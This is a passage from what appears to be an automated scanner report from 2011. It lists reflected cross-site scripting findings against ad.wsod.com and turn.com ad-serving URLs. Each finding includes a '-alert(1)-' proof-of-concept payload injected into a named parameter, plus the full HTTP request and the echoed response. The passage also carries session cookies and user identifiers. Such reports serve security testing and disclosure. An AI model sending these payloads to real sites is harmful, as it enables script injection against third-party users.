LHABVz72fi9fhT0whWU6oVuvamqLuW_YXqfv_SJ_aE8WghrAn-Vi2vPEwMGFNlZbYxEN2WSuwULQaF3F5bjuxzh7HBG162ww7piqD1aguph5yjHL13DurDt14-jGkVE335Ms9g0Q0vhgJiFRvR8WD6ypA0SKEqBppDDJhLx8qKy9TSvsYEqhZ0OHSuNp70BrBFPAk0ENEI9AkFKrpbmzGs3jQ_DNJLeHeL0m2Znba1buvjaUahkeh2AIOXYNj81E2-JjZ5NuKJfCva75n_nDp_hfB4P3wQx6U2WiVVEP-_Y7anyk5GyGEYfAPBsxHQjGZSlxmSbeaAgfibEHTq6nsWGJGTELtL4GqGulFNiuT83_aWjrAVXVlG7OWMAFleaNmJbd5mJVeqDBeYockQCeOAxxDWE5tfMM7qZbrjn2eVJNHmJxD5SUgD2Q8UYke7KpqkQLRuw_4qwIZ0RgbwcKb_zPkrK-DNPDU2d6IfOlnKh298JoqNIrcIOFh27SKktj64bitenuXABFvYGLN_FjpjihOBVBmjYgTdoaGQQaMdORRSUpCyAfviw4AHYe3ZFe1j_H39CNFZoidFAH_Wwsr2KYkmu9Efz59RTTwRXe0-z-VzZOXR8fEEZYabQJ5OvIrK9qaou5b9hep-_9In9oTxYDFxyCqW2pHLJpyn6DipzREQ3ZZK7BQtBoXcXluO7HOHYn_JVSl2TRope3S5e7WdCOJuOFdBL4jJzlrGgOb4HBkyz2DRDS-GAmIVG9HxYPrCWrE7nz-KJuRo7xf7_4TaxNK-xgSqFnQ4dK42nvQGsE6ABEyeT6GgYO9T7bPr2uOIHF81yXCYglNgztjlxXYaK-NpRqGR6HYAg5dg2PzUTbalw8lqs5Yl_9jBwMs9Tj-V8Hg_fBDHpTZaJVUQ_79jtEExTCNts46MM726dOH
k03EHP-IMF08vrzIT3Bb7Svo5bd5mJVeqDBeYockQCeOAxOo3HTnz6UEXwFhetL-lkMHmJxD5SUgD2Q8UYke7KpqjCzTD1GHFKXcyzidRcl9QVgKfB9VVbr4TUFv2p7bOInOewUt5gP_VlI1Ump9cof8bgUMqrglLkQZ2MmUdI_wRihOBVBmjYgTdoaGQQaMdORXsA1mfR2ULXMKrWuUdGM7RySCcjLsN_cxeO5d6Ll7ah1ym-8DGu-cUq_NzKN12epXgVQXjOJNmBQaMF-8bSNxK9qaou5b9hep-_9In9oTxbS-ghZdhmAasmF69aaImA6EQ3ZZK7BQtBoXcXluO7HOMQfuZ4AWvTJ-mwSNztcWshzAqXI_s6r0eNAoWe_e9VLkyz2DRDS-GAmIVG9HxYPrH5VjA_u5FxGvMqUnf9TQBxNK-xgSqFnQ4dK42nvQGsEmI9YI0NszyrnjSHCBrHOF7N0yDfDXTWmk3YZuned4J1zHpbFxYCHf8ECnS552zQGcx6WxcWAh3_BAp0ueds0BnMelsXFgId_wQKdLnnbNAZzHpbFxYCHf8ECnS552zQGcx6WxcWAh3_BAp0ueds0BitnssvNEea-CDLDeF-fwACvWXqvkkof0pdy12XNR71Ur1l6r5JKH9KXctdlzUe9VK9Zeq-SSh_Sl3LXZc1HvVSvWXqvkkof0pdy12XNR71UF-e0dAu4qNmsK2oR2A9RUQVMCl8aLbGecDd_fKt7NywFTApfGi2xnnA3f3yrezcsBUwKXxotsZ5wN398q3s3LAYbc69DjOHmwnxze8q4bqJPPYJ8usI-1hBBRr5uFxgFqfvBa32ACLSnDYXKF1oBeqn7wWt9gAi0pw2FyhdaAXqp-8FrfYAItKcNhcoXWgF6qfvBa32ACLSnDYXKF1oBeqn7wWt9gAi0pw2FyhdaAXryDt3w8cVNrM49PHXxiClIeDq2PHxBb0G93bZOUEV_B3g6tjx8QW9Bvd22TlBFfwd4OrY8fEFvQb3dtk5QRX8HeDq2PHxBb0G93bZOUEV_B34IJwkHmIrESNkEHZ8g1949RfOkpegw2OWd5Gq1X3SAPUXzpKXoMNjlneRqtV90gD1F86Sl6DDY5Z3karVfdIDVzbApqLD2dXriygnNopblFch-eoCuDk8x64052zPt2RXIfnqArg5PMeuNOdsz7dkVyH56gK4OTzHrjTnbM-3ZFch-eoCuDk8x64052zPt2RXIfnqArg5PMeuNOdsz7dkVyH56gK4OTzHrjTnbM-3ZE1zi3eUCecg106GXWo6ZhRNc4t3lAnnINdOhl1qOmYUTXOLd5QJ5yDXToZdajpmFE1zi3eUCecg106GXWo6ZhfPSjW7H5Jkol9-9LsOFip_z0o1ux-SZKJffvS7DhYqf89KNbsfkmSiX370uw4WKn5tSaxPmfiTgjAFYfvIlraaZa6cUR-KH2UMf-39oRIqSmWunFEfih9lDH_t_aESKkiaPGMMoWG79KMJG1_6B63rd33erOmBTEWjk8EHWq8r_3d93qzpgUxFo5PBB1qvK_33J5TXdC2nyuG8O3c9hqKb9UW1UfXUu5_t-s3mYQevC2GfmtRhuVY6zT1uCqUTs7wcwsdHQlOWV3VIdjcK2T9k; fc=k01_H3DQgin2gUWbqEfHVnEgVJOySuH7g303wn-3ThPBhSQ9y8oNWj2jHjllm2qL9SGC6KvWqijMODBe-PTw-vVibMqUG0iKKCPAs_vD_eA0A7iP8ARnu5R4osC1ayLKRfOX1MD02-o6SZ1b0c_HcdJnnDxsS-ubYBpridlzat8; 
pf=-jffvaaiYNPx61jB-getKKGyms2bzJ5NxJrHe2QHhR8CR6WdDKKuu1EG8_j0F9lfc-tfcqM5Jblcq-6eY583YF0Qxz0OvdT9GuJ7ViZ2YskPgkp2ShdDLnWVrYTrzrIfKDw8kdmwKgOeuifwfRXx2WIgKeliYqxPi2PuzFXXoEo-VuFfahHlgzh_QOs4p8bLZ2yzZnoMqlwp6K58itScC065x0FBCOqeNn5g6wtVvehK3A4I4wtIxPEx2nGfQAG9-vjZrSxhsgJSHWZlu-7Y8lLwHgaXnw1ge6GUoKaB63xdWz9GlTG1fD_ft3p4jB3znlsrDh8fqPATUgh_nFYrQkkmhbbfarzPZdSY8CyibyS7aDCXeV44OfVe9tEHSeUyDESfPnIeWIxfvM0y6r885gJOIocbmkc1C_88Fb9Lp0WkGr2pIJBbUJJxUowTPiGOvjVZlqhHi0TVaBtC-Ytynv5YO9Q0BRsH9i5yvt_pOdNope6-8bcU90Ecut78VcD3VCzgLVZar6mYj-saVcNK8bDe5HX-E1kIk4gMJUB1k1DJNiwErcR6V9-gMPdB133k3Gz1tfgKNZNU9_cW3FNJIvuoVf7YEa8qj1M0riyKsJMP889UjeORWgIr-IDHwwHe4aa1Pvsy5XpmxG2agnko3_pS6GAtAeZmbNLw3yp4AS1KB2Mkrz2y_-jzio6UgOMjGLgCypEar4RaFruO7KXpg7i87Up8F4Q_b2SCEfNkBVcVdzVlCffFCe9fh2T0OxlJf6yjX4dXAVH9x2WubCsF5Yfka217NmVFFyPB1XAcDp9sC5SExI0LW2uUE1ZEj_0G1W2BjDEY10nhggrTZVpS5CkyEIqZbkE5N4BDovA0bs0vLR8diqAiO12sv249SEi9T8YYfDFrAVtFne37-S8b6b8_zrRSm0Pn_iwZp5Njl1Ctpg-Y8MZ4iEuMM8h57h7sA40WqZv-4bpri7csL2Eha5MQmjlPbOzOgtl-6l2XpIhjxu24jEU-jOAKLeLr8pheLZ-qYOggCRZRzxBfMYedtI1f77e2n42rcO7SrM0VQPxYEPmgvy-5sxMT-JXr-g2mztPqvTmnqVETUDUDPzbGpX7rA2wO8p2W1d8jJh9Wgn5fQv_uySNMh5ni7dKMT_qlR38hdCL1cJUSjCa6-qS_S-29zjxGrVJzGjilqbfEkblssZ3oY8EBiTaXzLFtyqqBeor7c8lwYqgvOkdv7T9_7l0B_Epu2spdJD4h6srOYOyvPs-cbWt3Zsh03akXwoACfppvlMTRqhvXWsl2fX0MhUevEGq1iNRzaKvd2XK6i1aN_2f2T_joajRqNC2KFBlwaF-qXHEx7n0l8K5AqGkS2zWZAZsF6nB55Y-VWuh8k6sEdq2OLdTG1Gbl2PHH_MoRk6zbQBZT5wF4bk7NkJmustC7KfRHZkja4jwEjLaHhlg7ZUy9vbeaGjpbb28szQXKPl5sWT_iHlCQFplL5g_xAwZZxozQ-vwjBbTKEOR4EClMFKBR7NeyYw5CdFipM4nWYHDpnm_yCk_BXR62GHnDChO7-X0Yxrune2xG-PTuWOxbQ3iHJMqt1A83xKmmTpf1YhIPQubDCvHxB0Aj59dKNWd1PyhyVvb3_Imo3z4jO4Q_3rN-08zinn8vOajT3qjsF6G3eK8GfPeHCjDxdpQTpQ; uid=8392341830659049202; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004%7C1005%7C12; rds=15054%7C15054%7C15054%7C15056%7Cundefined%7C15054%7C15054%7C15038%7C15054%7C15054%7C15054%7C15054%7Cundefined%7C15054%7C15050%7C15054; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8392341830659049202; Domain=.turn.com; Expires=Sun, 18-Sep-2011 22:04:29 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 22 Mar 2011 22:04:29 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8392341830659049202&rnd=7104343394977138161&fpid=ab508"><script>alert(1)</script>f28986d6202&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b52b0'-alert(1)-'69856e0ae5 was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=clickb52b0'-alert(1)-'69856e0ae5&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:45:30 GMT; path=/
Set-Cookie: i_1=25:1456:434:106:0:42422:1300909530:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:45:30 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 904

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=clickb52b0'-alert(1)-'69856e0ae5&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703
...[SNIP]...

1.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47721'-alert(1)-'0ea823b3fbc was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=48323847721'-alert(1)-'0ea823b3fbc&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:46:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:46:21 GMT; path=/
Set-Cookie: i_1=25:1456:839:106:0:42422:1300909581:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:46:21 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 909

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=48323847721'-alert(1)-'0ea823b3fbc&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,454
...[SNIP]...

1.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2edd'-alert(1)-'7991b1a15c5 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442a2edd'-alert(1)-'7991b1a15c5&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:45:54 GMT; path=/
Set-Cookie: i_1=25:1456:839:106:0:42422:1300909554:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:45:54 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 909

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442a2edd'-alert(1)-'7991b1a15c5&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,452
...[SNIP]...

1.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fc65'-alert(1)-'9bd97f7bd61 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=7fc65'-alert(1)-'9bd97f7bd61 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:47:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:47:57 GMT; path=/
Set-Cookie: i_1=25:1456:839:106:0:42422:1300909677:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:47:57 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 909

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043
...[SNIP]...
33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=7fc65'-alert(1)-'9bd97f7bd61http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.839.iframe.150x50/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out more!">
...[SNIP]...

1.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [Segments parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81418'-alert(1)-'8b88db78e28 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,4780581418'-alert(1)-'8b88db78e28&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:47:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:47:16 GMT; path=/
Set-Cookie: i_1=25:1456:839:106:0:42422:1300909636:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:47:16 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 909

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043
...[SNIP]...
